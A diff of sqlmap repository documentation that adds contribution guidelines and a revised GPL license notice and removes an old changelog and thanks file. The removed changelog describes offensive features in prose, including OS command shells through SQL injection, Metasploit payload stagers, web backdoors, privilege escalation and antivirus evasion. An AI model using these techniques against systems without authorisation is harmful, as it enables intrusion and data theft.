+## Submitting code changes
+
+All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).
+
+Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).
+Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!
+
+### Guidelines
+
+In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
+
+* Each patch should make one logical change.
+* Wrap code to 76 columns when possible.
+* Avoid tabbing, use four blank spaces instead.
+* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org).
+* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
+* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.
+* Style that is too different from main branch will be ''adapted'' by the developers side.
+* Do not touch anything inside `thirdparty/` and `extra/` folders.
+
+### Licensing
+
+By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.

doc/COPYING

@@ -1,8 +1,73 @@
+COPYING -- Describes the terms under which sqlmap is distributed. A copy
+of the GNU General Public License (GPL) is appended to this file.
+
+sqlmap is (C) 2006-2016 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+
+This program is free software; you may redistribute and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation; Version 2 (or later) with the clarifications and
+exceptions described below. This guarantees your right to use, modify, and
+redistribute this software under certain conditions. If you wish to embed
+sqlmap technology into proprietary software, we sell alternative licenses
+(contact sales@sqlmap.org).
+
+Note that the GPL places important restrictions on "derived works", yet it
+does not provide a detailed definition of that term. To avoid
+misunderstandings, we interpret that term as broadly as copyright law
+allows. For example, we consider an application to constitute a "derived
+work" for the purpose of this license if it does any of the following:
+* Integrates source code from sqlmap.
+* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml
+* Executes sqlmap and parses the results (as opposed to typical shell or
+  execution-menu apps, which simply display raw sqlmap output and so are
+  not derivative works).
+* Integrates/includes/aggregates sqlmap into a proprietary executable
+  installer, such as those produced by InstallShield.
+* Links to a library or executes a program that does any of the above
+
+The term "sqlmap" should be taken to also include any portions or derived
+works of sqlmap. This list is not exclusive, but is meant to clarify our
+interpretation of derived works with some common examples. Our
+interpretation applies only to sqlmap - we do not speak for other people's
+GPL works.
+
+If you have any questions about the GPL licensing restrictions on using
+sqlmap in non-GPL works, we would be happy to help. As mentioned above,
+we also offer alternative license to integrate sqlmap into proprietary
+applications and appliances.
+
+If you received these files with a written license agreement or contract
+stating terms other than the terms above, then that alternative license
+agreement takes precedence over these comments.
+
+Source is provided to this software because we believe users have a right
+to know exactly what a program is going to do before they run it.
+
+Source code also allows you to fix bugs and add new features. You are
+highly encouraged to send your changes to dev@sqlmap.org for possible
+incorporation into the main distribution. By sending these changes to the
+sqlmap developers, to the mailing lists, or via Git pull request, checking
+them into the sqlmap source code repository, it is understood (unless you
+specify otherwise) that you are offering the sqlmap project the unlimited,
+non-exclusive right to reuse, modify, and relicense the code. sqlmap will
+always be available Open Source, but this is important because the
+inability to relicense code has caused devastating problems for other Free
+Software projects (such as KDE and NASM). If you wish to specify special
+license conditions of your contributions, just say so when you send them.
+
+This program is distributed in the hope that it will be useful, but
+WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+General Public License v2.0 for more details at
+http://www.gnu.org/licenses/gpl-2.0.html, or below
+
+****************************************************************************
+
                     GNU GENERAL PUBLIC LICENSE
                        Version 2, June 1991
 
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.
-                       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
  Everyone is permitted to copy and distribute verbatim copies
  of this license document, but changing it is not allowed.
 
@@ -15,7 +80,7 @@ software--to make sure the software is free for all its users.  This
 General Public License applies to most of the Free Software
 Foundation's software and to any other program whose authors commit to
 using it.  (Some other Free Software Foundation software is covered by
-the GNU Library General Public License instead.)  You can apply it to
+the GNU Lesser General Public License instead.)  You can apply it to
 your programs, too.
 
   When we speak of free software, we are referring to freedom, not
@@ -55,7 +120,7 @@ patent must be licensed for everyone's free use or not licensed at all.
 
   The precise terms and conditions for copying, distribution and
 modification follow.
-
+
                     GNU GENERAL PUBLIC LICENSE
    TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
 
@@ -110,7 +175,7 @@ above, provided that you also meet all of these conditions:
     License.  (Exception: if the Program itself is interactive but
     does not normally print such an announcement, your work based on
     the Program is not required to print an announcement.)
-
+
 These requirements apply to the modified work as a whole.  If
 identifiable sections of that work are not derived from the Program,
 and can be reasonably considered independent and separate works in
@@ -168,7 +233,7 @@ access to copy from a designated place, then offering equivalent
 access to copy the source code from the same place counts as
 distribution of the source code, even though third parties are not
 compelled to copy the source along with the object code.
-
+
   4. You may not copy, modify, sublicense, or distribute the Program
 except as expressly provided under this License.  Any attempt
 otherwise to copy, modify, sublicense or distribute the Program is
@@ -225,7 +290,7 @@ impose that choice.
 
 This section is intended to make thoroughly clear what is believed to
 be a consequence of the rest of this License.
-
+
   8. If the distribution and/or use of the Program is restricted in
 certain countries either by patents or by copyrighted interfaces, the
 original copyright holder who places the Program under this License
@@ -278,63 +343,30 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
 POSSIBILITY OF SUCH DAMAGES.
 
                      END OF TERMS AND CONDITIONS
-
-	    How to Apply These Terms to Your New Programs
 
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
+****************************************************************************
 
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
+This license does not apply to the following components:
 
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
+* The Ansistrm library located under thirdparty/ansistrm/.
+* The Beautiful Soup library located under thirdparty/beautifulsoup/.
+* The Bottle library located under thirdparty/bottle/.
+* The Chardet library located under thirdparty/chardet/.
+* The ClientForm library located under thirdparty/clientform/.
+* The Colorama library located under thirdparty/colorama/.
+* The Fcrypt library located under thirdparty/fcrypt/.
+* The Gprof2dot library located under thirdparty/gprof2dot/.
+* The KeepAlive library located under thirdparty/keepalive/.
+* The Magic library located under thirdparty/magic/.
+* The MultipartPost library located under thirdparty/multipartpost/.
+* The Odict library located under thirdparty/odict/.
+* The Oset library located under thirdparty/oset/.
+* The PageRank library located under thirdparty/pagerank/.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+* The PyDes library located under thirdparty/pydes/.
+* The SocksiPy library located under thirdparty/socks/.
+* The Termcolor library located under thirdparty/termcolor/.
+* The XDot library located under thirdparty/xdot/.
+* The icmpsh tool located under extra/icmpsh/.
 
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Library General
-Public License instead of this License.
+Details for the above packages can be found in the THIRD-PARTY.md file.

doc/ChangeLog

@@ -1,487 +0,0 @@
-sqlmap (0.8-1) stable; urgency=low
-
-  * Support to enumerate and dump all databases' tables containing user
-    provided column(s) by specifying for instance '--dump -C user,pass'.
-    Useful to identify for instance tables containing custom application
-    credentials (Bernardo).
-  * Support to parse -C (column name(s)) when fetching
-    columns of a table with --columns: it will enumerate only columns like
-    the provided one(s) within the specified table (Bernardo).
-  * Support for takeover features on PostgreSQL 8.4 (Bernardo).
-  * Enhanced --priv-esc to rely on new Metasploit Meterpreter's
-    'getsystem' command to elevate privileges of the user running the
-    back-end DBMS instance to SYSTEM on Windows (Bernardo).
-  * Automatic support in --os-pwn to use the web uploader/backdoor to
-    upload and execute the Metasploit payload stager when stacked queries
-    SQL injection is not supported, for instance on MySQL/PHP and
-    MySQL/ASP, but there is a writable folder within the web server
-    document root (Bernardo and Miroslav).
-  * Fixed web backdoor functionality for --os-cmd, --os-shell and --os-pwn
-    useful when web application does not support stacked queries (Bernardo).
-  * Added support to properly read (--read-file) also binary files via
-    PostgreSQL by injecting sqlmap new sys_fileread() user-defined
-    function (Bernardo and Miroslav).
-  * Updated active fingerprint and comment injection fingerprint for
-    MySQL 5.1, MySQL 5.4 and MySQL 5.5 (Bernardo).
-  * Updated active fingerprint for PostgreSQL 8.4 (Bernardo).
-  * Support for NTLM authentication via python-ntlm third party library,
-    http://code.google.com/p/python-ntlm/, --auth-type NTLM (Bernardo).
-  * Support to automatically decode deflate, gzip and x-gzip HTTP
-    responses (Miroslav).
-  * Support for Certificate authentication, --auth-cert option added
-    (Miroslav).
-  * Added support for regular expression based scope when parsing Burp or
-    Web Scarab proxy log file (-l), --scope (Miroslav).
-  * Added option (-r) to load a single HTTP request from a text file
-    (Miroslav).
-  * Added option (--ignore-proxy) to ignore system default HTTP proxy
-    (Miroslav).
-  * Added support to ignore Set-Cookie in HTTP responses,
-    --drop-set-cookie (Miroslav).
-  * Added support to specify which Google dork result page to parse,
-    --gpage to be used together with -g (Miroslav).
-  * Major bug fix and enhancements to the multi-threading (--threads)
-    functionality (Miroslav).
-  * Fixed URL encoding/decoding of GET/POST parameters and Cookie header
-    (Miroslav).
-  * Refactored --update to use python-svn third party library if available
-    or 'svn' command to update sqlmap to the latest development version
-    from subversion repository (Bernardo and Miroslav).
-  * Major bugs fixed (Bernardo and Miroslav).
-  * Cleanup of UDF source code repository,
-    https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack (Bernardo
-    and Miroslav).
-  * Major code cleanup (Miroslav).
-  * Added simple file encryption/compression utility, extra/cloak/cloak.py,
-    used by sqlmap to decrypt on the fly Churrasco, UPX executable and web
-    shells consequently reducing drastically the number of anti-virus
-    softwares that mistakenly mark sqlmap as a malware (Miroslav).
-  * Updated user's manual (Bernardo and Miroslav).
-  * Created several demo videos, hosted on YouTube
-    (http://www.youtube.com/user/inquisb) and linked from
-    http://sqlmap.sourceforge.net/demo.html (Bernardo).
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 14 Mar 2010 10:00:00 +0000
-
-sqlmap (0.8rc1-1) stable; urgency=low
-
-  * Major enhancement to the Microsoft SQL Server stored procedure
-    heap-based buffer overflow exploit (--os-bof) to automatically bypass
-    DEP memory protection.
-  * Added support for MySQL and PostgreSQL to execute Metasploit shellcode
-    via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an
-    option instead of uploading the standalone payload stager executable.
-  * Added options for MySQL, PostgreSQL and Microsoft SQL Server to
-    read/add/delete Windows registry keys.
-  * Added options for MySQL and PostgreSQL to inject custom user-defined
-    functions.
-  * Added support for --first and --last so the user now has even more
-    granularity in what to enumerate in the query output.
-  * Minor enhancement to save the session by default in
-    'output/hostname/session' file if -s option is not specified.
-  * Minor improvement to automatically remove sqlmap created temporary
-    files from the DBMS underlying file system.
-  * Minor bugs fixed.
-  * Major code refactoring.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon, 21 Sep 2009 15:00:00 +0000
-
-sqlmap (0.7-1) stable; urgency=low
-
-  * Adapted Metasploit wrapping functions to work with latest 3.3
-    development version too.
-  * Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
-  * Reset takeover OOB features (if any of --os-pwn, --os-smbrelay or
-    --os-bof is selected) when running under Windows because msfconsole
-    and msfcli are not supported on the native Windows Ruby interpreter.
-    This make sqlmap 0.7 to work again on Windows too.
-  * Minor improvement so that sqlmap tests also all parameters with no
-    value (eg. par=).
-  * HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and
-    2.6+.
-  * Major bug fix to sql-query/sql-shell features.
-  * Major bug fix in --read-file option.
-  * Major silent bug fix to multi-threading functionality.
-  * Fixed the web backdoor functionality (for MySQL) when (usually) stacked
-    queries are not supported and --os-shell is provided.
-  * Fixed MySQL 'comment injection' version fingerprint.
-  * Fixed basic Microsoft SQL Server 2000 fingerprint.
-  * Many minor bug fixes and code refactoring.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 25 Jul 2009 10:00:00 +0000
-
-sqlmap (0.7rc1-1) stable; urgency=low
-
-  * Added support to execute arbitrary commands on the database server
-    underlying operating system either returning the standard output or not
-    via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored
-    procedure on Microsoft SQL Server;
-  * Added support for out-of-band connection between the attacker box and
-    the database server underlying operating system via stand-alone payload
-    stager created by Metasploit and supporting Meterpreter, shell and VNC
-    payloads for both Windows and Linux;
-  * Added support for out-of-band connection via Microsoft SQL Server 2000
-    and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer
-    overflow (MS09-004) exploitation with multi-stage Metasploit payload
-    support;
-  * Added support for out-of-band connection via SMB reflection attack with
-    UNC path request from the database server to the attacker box by using
-    the Metasploit smb_relay exploit;
-  * Added support to read and write (upload) both text and binary files on
-    the database server underlying file system for MySQL, PostgreSQL and
-    Microsoft SQL Server;
-  * Added database process' user privilege escalation via Windows Access
-    Tokens kidnapping on MySQL and Microsoft SQL Server via either
-    Meterpreter's incognito extension or Churrasco stand-alone executable;
-  * Speed up the inference algorithm by providing the minimum required
-    charset for the query output;
-  * Major bug fix in the comparison algorithm to correctly handle also the
-    case that the url is stable and the False response changes the page
-    content very little;
-  * Many minor bug fixes, minor enhancements and layout adjustments.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 22 Apr 2009 10:30:00 +0000
-
-sqlmap (0.6.4-1) stable; urgency=low
-
-  * Major enhancement to make the comparison algorithm work properly also
-    on url not stables automatically by using the difflib Sequence Matcher
-    object;
-  * Major enhancement to support SQL data definition statements, SQL data
-    manipulation statements, etc from user in SQL query and SQL shell if
-    stacked queries are supported by the web application technology;
-  * Major speed increase in DBMS basic fingerprint;
-  * Minor enhancement to support an option (--is-dba) to show if the
-    current user is a database management system administrator;
-  * Minor enhancement to support an option (--union-tech) to specify the
-    technique to use to detect the number of columns used in the web
-    application SELECT statement: NULL bruteforcing (default) or ORDER BY
-    clause bruteforcing;
-  * Added internal support to forge CASE statements, used only by --is-dba
-    query at the moment;
-  * Minor layout adjustment to the --update output;
-  * Increased default timeout to 30 seconds;
-  * Major bug fix to correctly handle custom SQL "limited" queries on
-    Microsoft SQL Server and Oracle;
-  * Major bug fix to avoid tracebacks when multiple targets are specified
-    and one of them is not reachable;
-  * Minor bug fix to make the Partial UNION query SQL injection technique
-    work properly also on Oracle and Microsoft SQL Server;
-  * Minor bug fix to make the --postfix work even if --prefix is not
-    provided;
-  * Updated documentation.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Tue,  3 Feb 2009 23:30:00 +0000
-
-sqlmap (0.6.3-1) stable; urgency=low
-
-  * Major enhancement to get list of targets to test from Burp proxy
-    (http://portswigger.net/suite/) requests log file path or WebScarab
-    proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
-    'conversations/' folder path by providing option -l <filepath>;
-  * Major enhancement to support Partial UNION query SQL injection
-    technique too;
-  * Major enhancement to test if the web application technology supports
-    stacked queries (multiple statements) by providing option
-    --stacked-test which will be then used someday also by takeover
-    functionality;
-  * Major enhancement to test if the injectable parameter is affected by
-    a time based blind SQL injection technique by providing option
-    --time-test;
-  * Minor enhancement to fingerprint the web server operating system and
-    the web application technology by parsing some HTTP response headers;
-  * Minor enhancement to fingerprint the back-end DBMS operating system by
-    parsing the DBMS banner value when -b option is provided;
-  * Minor enhancement to be able to specify the number of seconds before
-    timeout the connection by providing option --timeout #, default is set
-    to 10 seconds and must be 3 or higher;
-  * Minor enhancement to be able to specify the number of seconds to wait
-    between each HTTP request by providing option --delay #;
-  * Minor enhancement to be able to get the injection payload --prefix and
-    --postfix from user;
-  * Minor enhancement to be able to enumerate table columns and dump table
-    entries, also when the database name is not provided, by using the
-    current database on MySQL and Microsoft SQL Server, the 'public'
-    scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
-  * Minor enhancemet to support also --regexp, --excl-str and --excl-reg
-    options rather than only --string when comparing HTTP responses page
-    content;
-  * Minor enhancement to be able to specify extra HTTP headers by providing
-    option --headers. By default Accept, Accept-Language and Accept-Charset
-    headers are set;
-  * Minor improvement to be able to provide CU (as current user) as user
-    value (-U) when enumerating users privileges or users passwords;
-  * Minor improvements to sqlmap Debian package files;
-  * Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
-    library if available to speed up the sqlmap algorithmic operations;
-  * Minor improvement to retry the HTTP request up to three times in case
-    an exception is raised during the connection to the target url;
-  * Major bug fix to correctly enumerate columns on Microsoft SQL Server;
-  * Major bug fix so that when the user provide a SELECT statement to be
-    processed with an asterisk as columns, now it also work if in the FROM
-    there is no database name specified;
-  * Minor bug fix to correctly dump table entries when the column is
-    provided;
-  * Minor bug fix to correctly handle session.error, session.timeout and
-    httplib.BadStatusLine exceptions in HTTP requests;
-  * Minor bug fix to correctly catch connection exceptions and notify to
-    the user also if they occur within a thread;
-  * Increased default output level from 0 to 1;
-  * Updated documentation.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Thu, 18 Dec 2008 10:00:00 +0000
-
-sqlmap (0.6.2-1) stable; urgency=low
-
-  * Major bug fix to correctly dump tables entries when --stop is not
-    specified;
-  * Major bug fix so that the users' privileges enumeration now works
-    properly also on both MySQL < 5.0 and MySQL >= 5.0;
-  * Major bug fix when the request is POST to also send the GET parameters
-    if any have been provided;
-  * Major bug fix to correctly update sqlmap to the latest stable release
-    with command line --update;
-  * Major bug fix so that when the expected value of a query (count
-    variable) is an integer and, for some reasons, its resumed value from
-    the session file is a string or a binary file, the query is executed
-    again and its new output saved to the session file;
-  * Minor bug fix in MySQL comment injection fingerprint technique;
-  * Minor improvement to correctly enumerate tables, columns and dump
-    tables entries on Oracle and on PostgreSQL when the database name is
-    not 'public' schema or a system database;
-  * Minor improvement to be able to dump entries on MySQL < 5.0 when
-    database name, table name and column(s) are provided;
-  * Updated the database management system fingerprint checks to correctly
-    identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
-  * More user-friendly warning messages.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  2 Nov 2008 19:00:00 +0000
-
-sqlmap (0.6.1-1) stable; urgency=low
-
-  * Major bug fix to blind SQL injection bisection algorithm to handle an
-    exception;
-  * Added a Metasploit Framework 3 auxiliary module to run sqlmap;
-  * Implemented possibility to test for and inject also on LIKE
-    statements;
-  * Implemented --start and --stop options to set the first and the last
-    table entry to dump;
-  * Added non-interactive/batch-mode (--batch) option to make it easy to
-    wrap sqlmap in Metasploit and any other tool;
-  * Minor enhancement to save also the length of query output in the
-    session file when retrieving the query output length for ETA or for
-    resume purposes;
-  * Changed the order sqlmap dump table entries from column by column to
-    row by row. Now it also dumps entries as they are stored in the tables,
-    not forcing the entries' order alphabetically anymore;
-  * Minor bug fix to correctly handle parameters' value with % character.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 20 Oct 2008 10:00:00 +0000
-
-sqlmap (0.6-1) stable; urgency=low
-
-  * Complete code refactor and many bugs fixed;
-  * Added multithreading support to set the maximum number of concurrent
-    HTTP requests;
-  * Implemented SQL shell (--sql-shell) functionality and fixed SQL query
-    (--sql-query, before called -e) to be able to run whatever SELECT
-    statement and get its output in both inband and blind SQL injection
-    attack;
-  * Added an option (--privileges) to retrieve DBMS users privileges, it
-    also notifies if the user is a DBMS administrator;
-  * Added support (-c) to read options from configuration file, an example
-    of valid INI file is sqlmap.conf and support (--save) to save command
-    line options on a configuration file;
-  * Created a function that updates the whole sqlmap to the latest stable
-    version available by running sqlmap with --update option;
-  * Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.)
-    installation binary packages;
-  * Created sqlmap .exe (Windows) portable executable;
-  * Save a lot of more information to the session file, useful when
-    resuming injection on the same target to not loose time on identifying
-    injection, UNION fields and back-end DBMS twice or more times;
-  * Improved automatic check for parenthesis when testing and forging SQL
-    query vector;
-  * Now it checks for SQL injection on all GET/POST/Cookie parameters then
-    it lets the user select which parameter to perform the injection on in
-    case that more than one is injectable;
-  * Implemented support for HTTPS requests over HTTP(S) proxy;
-  * Added a check to handle NULL or not available queries output;
-  * More entropy (randomStr() and randomInt() functions in
-    lib/core/common.py) in inband SQL injection concatenated query and in
-    AND condition checks;
-  * Improved XML files structure;
-  * Implemented the possibility to change the HTTP Referer header;
-  * Added support to resume from session file also when running with
-    inband SQL injection attack;
-  * Added an option (--os-shell) to execute operating system commands if
-    the back-end DBMS is MySQL, the web server has the PHP engine active
-    and permits write access on a directory within the document root;
-  * Added a check to assure that the provided string to match (--string)
-    is within the page content;
-  * Fixed various queries in XML file;
-  * Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted
-    the library to parse it;
-  * Fixed password fetching function, mainly for Microsoft SQL Server and
-    reviewed the password hashes parsing function;
-  * Major bug fixed to avoid tracebacks when the testable parameter(s) is
-    dynamic, but not injectable;
-  * Enhanced logging system: added three more levels of verbosity to show
-    also HTTP sent and received traffic;
-  * Enhancement to handle Set-Cookie from target url and automatically
-    re-establish the Session when it expires;
-  * Added support to inject also on Set-Cookie parameters;
-  * Implemented TAB completion and command history on both --sql-shell and
-    --os-shell;
-  * Renamed some command line options;
-  * Added a conversion library;
-  * Added code schema and reminders for future developments;
-  * Added Copyright comment and $Id$;
-  * Updated the command line layout and help messages;
-  * Updated some docstrings;
-  * Updated documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon,  1 Sep 2008 10:00:00 +0100
-
-sqlmap (0.5-1) stable; urgency=low
-
-  * Added support for Oracle database management system
-  * Extended inband SQL injection functionality (--union-use) to all
-    other possible queries since it only worked with -e and --file on
-    all DMBS plugins;
-  * Added support to extract database users password hash on Microsoft
-    SQL Server;
-  * Added a fuzzer function with the aim to parse HTML page looking
-    for standard database error messages consequently improving
-    database fingerprinting;
-  * Added support for SQL injection on HTTP Cookie and User-Agent headers;
-  * Reviewed HTTP request library (lib/request.py) to support the
-    extended inband SQL injection functionality. Splitted getValue()
-    into getInband() and getBlind();
-  * Major enhancements in common library and added checkForBrackets()
-    method to check if the bracket(s) are needed to perform a UNION query
-    SQL injection attack;
-  * Implemented --dump-all functionality to dump entire DBMS data from
-    all databases tables;
-  * Added support to exclude DBMS system databases' when enumeration
-    tables and dumping their entries (--exclude-sysdbs);
-  * Implemented in Dump.dbTableValues() method the CSV file dumped data
-    automatic saving in csv/ folder by default;
-  * Added DB2, Informix and Sybase DBMS error messages and minor
-    improvements in xml/errors.xml;
-  * Major improvement in all three DBMS plugins so now sqlmap does not
-    get entire databases' tables structure when all of database/table/
-    column are specified to be dumped;
-  * Important fixes in lib/option.py to make sqlmap properly work also
-    with python 2.5 and handle the CSV dump files creation work also
-    under Windows operating system, function __setCSVDir() and fixed
-    also in lib/dump.py;
-  * Minor enhancement in lib/injection.py to randomize the number
-    requested to test the presence of a SQL injection affected parameter
-    and implemented the possibilities to break (q) the for cycle when
-    using the google dork option (-g);
-  * Minor fix in lib/request.py to properly encode the url to request
-    in case the "fixed" part of the url has blank spaces;
-  * More minor layout enhancements in some libraries;
-  * Renamed DMBS plugins;
-  * Complete code refactoring, a lot of minor and some major fixes in
-    libraries, many minor improvements;
-  * Updated all documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun,  4 Nov 2007 20:00:00 +0100
-
-sqlmap (0.4-1) stable; urgency=low
-
-  * Added DBMS fingerprint based also upon HTML error messages parsing
-    defined in lib/parser.py which reads an XML file defining default
-    error messages for each supported DBMS;
-  * Added Microsoft SQL Server extensive DBMS fingerprint checks based
-    upon accurate '@@version' parsing matching on an XML file to get also
-    the exact patching level of the DBMS;
-  * Added support for query ETA (Estimated Time of Arrival) real time
-    calculation (--eta);
-  * Added support to extract database management system users password
-    hash on MySQL and PostgreSQL (--passwords);
-  * Added docstrings to all functions, classes and methods, consequently
-    released the sqlmap development documentation
-    <http://sqlmap.sourceforge.net/dev/>;
-  * Implemented Google dorking feature (-g) to take advantage of Google
-    results affected by SQL injection to perform other command line
-    argument on their DBMS;
-  * Improved logging functionality: passed from banal 'print' to Python
-    native logging library;
-  * Added support for more than one parameter in '-p' command line
-    option;
-  * Added support for HTTP Basic and Digest authentication methods
-    (--basic-auth and --digest-auth);
-  * Added the command line option '--remote-dbms' to manually specify
-    the remote DBMS;
-  * Major improvements in union.UnionCheck() and union.UnionUse()
-    functions to make it possible to exploit inband SQL injection also
-    with database comment characters ('--' and '#') in UNION query
-    statements;
-  * Added the possibility to save the output into a file while performing
-    the queries (-o OUTPUTFILE) so it is possible to stop and resume the
-    same query output retrieving in a second time (--resume);
-  * Added support to specify the database table column to enumerate
-    (-C COL);
-  * Added inband SQL injection (UNION query) support (--union-use);
-  * Complete code refactoring, a lot of minor and some major fixes in
-    libraries, many minor improvements;
-  * Reviewed the directory tree structure;
-  * Splitted lib/common.py: inband injection functionalities now are
-    moved to lib/union.py;
-  * Updated documentation files.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Fri, 15 Jun 2007 20:00:00 +0100
-
-sqlmap (0.3-1) stable; urgency=low
-
-  * Added module for MS SQL Server;
-  * Strongly improved MySQL dbms active fingerprint and added MySQL
-    comment injection check;
-  * Added PostgreSQL dbms active fingerprint;
-  * Added support for string match (--string);
-  * Added support for UNION check (--union-check);
-  * Removed duplicated code, delegated most of features to the engine
-    in common.py and option.py;
-  * Added support for --data command line argument to pass the string
-    for POST requests;
-  * Added encodeParams() method to encode url parameters before making
-    http request;
-  * Many bug fixes;
-  * Rewritten documentation files;
-  * Complete code restyling.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sat, 20 Jan 2007 20:00:00 +0100
-
-sqlmap (0.2-1) stable; urgency=low
-
-  * complete refactor of entire program;
-  * added TODO and THANKS files;
-  * added some papers references in README file;
-  * moved headers to user-agents.txt, now -f parameter specifies a file
-    (user-agents.txt) and randomize the selection of User-Agent header;
-  * strongly improved program plugins (mysqlmap.py and postgres.py),
-    major enhancements:
-    * improved active mysql fingerprint check_dbms();
-    * improved enumeration functions for both databases;
-    * minor changes in the unescape() functions;
-  * replaced old inference algorithm with a new bisection algorithm.
-  * reviewed command line parameters, now with -p it's possible to
-    specify the parameter you know it's vulnerable to sql injection,
-    this way the script won't perform the sql injection checks itself;
-    removed the TOKEN parameter;
-  * improved Common class, adding support for http proxy and http post
-    method in hash_page;
-  * added OptionCheck class in option.py which performs all needed checks
-    on command line parameters and values;
-  * added InjectionCheck class in injection.py which performs check on
-    url stability, dynamics of parameters and injection on dynamic url
-    parameters;
-  * improved output methods in dump.py;
-  * layout enhancement on main program file (sqlmap.py), adapted to call
-    new option/injection classes and improvements on catching of
-    exceptions.
-
- -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Wed, 13 Dec 2006 20:00:00 +0100

doc/THANKS

@@ -1,318 +0,0 @@
-== Individuals ==
-
-David Alvarez <david.alvarez.s@gmail.com>
-    for reporting a bug
-
-Chip Andrews <chip@sqlsecurity.com>
-    for his excellent work maintaining the SQL Server versions database
-    at SQLSecurity.com and permission to implement the update feature
-    taking data from his site
-
-Otavio Augusto <otavioarj@gmail.com>
-    for reporting a minor bug
-
-Simon Baker <simonb@sec-1.com>
-    for reporting some bugs
-
